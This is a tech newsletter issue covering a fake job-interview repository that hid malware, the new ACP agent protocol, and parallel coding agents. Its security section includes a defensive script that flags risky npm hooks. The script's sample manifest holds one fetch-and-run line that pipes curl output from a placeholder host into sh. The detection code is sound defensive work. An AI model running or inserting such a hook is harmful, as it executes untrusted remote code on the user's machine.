
So Nerdy Planet #11

by Dima Maleev
Oct 20, 2025

So Nerdy Planet! is a weekly (at least I am trying) newsletter about news that seems important.

In this newsletter, we will speak about:

  1. How AI saved an engineer from a fake interview
  2. One more protocol for working with AI
  3. Parallel coding agents as a new development style

AI saved an engineer from a hack on a fake interview

No one likes it when a test task is part of the interview process. It is worse when your computer can be hacked by doing that test. Yes, it sounds ridiculous, but that’s exactly what happened in this story. David Dodda was 30 seconds away from turning his machine into someone else’s playground after what appeared to be a “legit” coding interview.

What Went Down
  • A Chief Blockchain Officer on LinkedIn reached out, saying they liked David’s background and wanted a “technical interview” for a blockchain company role. 

  • The company sent a Bitbucket repo, clean-looking code, “just small fixes,” and instructions to install dependencies and run them. Typical dev task, right?

  • But hidden in the repo was what turned out to be malicious code. David recognized the red flags just before he hit “run”.

  • He asked Cursor if there was some suspicious code in the codebase, and there was.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t.

The attack was sophisticated. The LinkedIn profile looked legit, the company profile on LinkedIn looked real, and the approach was very professional. They even used Calendly to schedule a meeting.

Also:

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff.

According to an investigation on Hacker News, the account was created specifically for scamming people. Symfa as a company seems legit. Funnily enough, the account even has a "verified" badge.

 

LinkedIn does not help companies verify whether people really work there: anyone can put any company in their profile and write on its behalf.

It is clear that scammers will target developers who are somehow connected to blockchain development, since they are more likely to have crypto wallets installed on their PCs. By automating these attacks with scripts and AI, attackers can run them at scale, targeting multiple developers at the same time. As with all phishing, you don't need 100% success; you need one success, but a big one.

The author gives good tips for when you are running unverified code on your PC:

  1. Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.

  2. Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.

  3. Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.

  4. Trust your gut. If someone's rushing you to execute code, that's a red flag.

From my side: well, I am super impressed that AI detected the suspicious patterns. This is a use case I had never thought about.
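To make the "check before you run" advice concrete, here is a small Node.js check, added as an example and not code from David's post or from the repository involved. It lists the scripts that `npm install` and `npm start` run automatically and flags the ones that do more than a take-home test should; the heuristic patterns and the sample manifest are constructed assumptions.

```javascript
// Added example. Hook lists follow npm's documented lifecycle; the heuristics
// are generic assumptions, not indicators taken from the incident in the post.
const HOOKS = {
  "npm install": ["preinstall", "install", "postinstall", "prepare"],
  "npm start": ["prestart", "start", "poststart"],
};

const HEURISTICS = [
  ["spawns a shell or process", /child_process|\bexec(Sync)?\(|\|\s*(ba)?sh\b/],
  ["downloads from the network", /\b(curl|wget)\b|https?:\/\//],
  ["evaluates dynamic code", /\beval\(|new Function\(|\bnode\s+-e\b/],
  ["decodes embedded data", /base64|\batob\(/],
  ["touches home directory or environment", /~\/|\$HOME|os\.homedir\(|process\.env/],
];

// Labels of every heuristic that matches a command line or source text.
function flag(text) {
  return HEURISTICS.filter(([, re]) => re.test(text)).map(([label]) => label);
}

// One finding per script that the listed npm commands run automatically.
function auditScripts(pkgJsonText) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  const findings = [];
  for (const [command, hooks] of Object.entries(HOOKS)) {
    for (const hook of hooks) {
      // With no "start" script, npm falls back to running server.js.
      const run = scripts[hook] ?? (hook === "start" ? "node server.js" : null);
      if (run === null) continue;
      // Files the command hands to an interpreter: read these first.
      const files = run.match(/[\w./-]+\.[cm]?js\b/g) || [];
      findings.push({ command, hook, run, files, flags: flag(run) });
    }
  }
  return findings;
}

// Constructed sample manifest, not taken from the repository in the post.
const SAMPLE = JSON.stringify({
  name: "take-home-test",
  scripts: {
    postinstall: "node scripts/setup.js",
    prestart: "curl -s https://example.invalid/cfg | sh",
    start: "node src/index.js",
  },
});

for (const f of auditScripts(SAMPLE)) console.log(f.command, f.hook, f.run, f.flags, f.files);
```

Dependencies bring their own install hooks, so pair this with `npm install --ignore-scripts` inside a container or VM rather than treating a clean result as proof of safety.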


One more protocol for working with AI

I think every week I could present you a new protocol created to make working with AI generic, easier, more secure, and blah-blah-blah. Seriously, we need to stop this *CP mess. Today, we will speak about ACP - Agentic Client Protocol.

Anyway, as you remember, Anthropic developed its own protocol, called MCP. It kind of changed everything. Now you can create tools that an LLM knows about, and they can be used to get additional information, execute some logic, etc.

Model Context Protocol (MCP) an overview

Why do we need a new protocol? Because MCP is now supported by VS Code, but there are more IDEs around. That is why ACP was created by JetBrains and Zed (who have their own IDE) to compete with what is implemented in VS Code. In their words, anyone can use ACP, and it will integrate with every IDE that supports it with minimal or no work.

Also, ACP is a protocol created specifically for IDEs (which MCP was not), so it has a few more features, like:

  1. Bi-directional communications between AI agents and the IDE
  2. Support for interactive workflows like code generation & inline suggestions

  3. Support for calling local tools within the IDE, including reading files

Also, ACP supports MCP, so if you've created anything for MCP, it should work out of the box.

Based on what I can see from the ACP protocol, there should not be much work for VS Code IDEs to switch to this new protocol, and it seems way better in every aspect compared to the good old MCP (lol, 1 year is old now).


Parallel coding agents as a new development style

A couple of weeks ago, I saw that one of my engineers had a couple of code terminals open, and all of them were doing something different. With Claude Code, the engineer was discussing the new structure of the project before refactoring; CoPilot was writing tests; and Junie was going through a trial period and trying to write at least something (and it was failing with Scala code).

Anyway, that seems to be a new process for many developers now, starting from the blog post by Simon Willison and ending with many similar posts (link 1, link 2).

Surprisingly, this method of development seems to be becoming a new standard, where a couple of terminals with different AIs are doing different jobs, from researching new libraries and building prototypes to planning the development of new features with a checklist of requirements. Most developers who have applied this in their daily practice say that they've become way more productive than they were before.

But all of the engineers who apply this practice follow the same pattern:

  1. Defining step-by-step instructions on what will be done based on the requirements provided
  2. Reviewing every part of the code generated at every step
  3. Leaving the most complex part to themselves ( yeah! we are still coding!)

All of the engineers who are succeeding with this type of development are experienced, and I believe such an approach can be quite dangerous with less experienced engineers.


Community News

We are slowly growing our tools database, and last week we added a template for the Eisenhower Matrix ( by the way, one of the best I've seen :) )

Also, last week we had an invited guest at our bi-weekly meeting: we talked with Vlad Kampov, Staff Engineer @ Netflix!
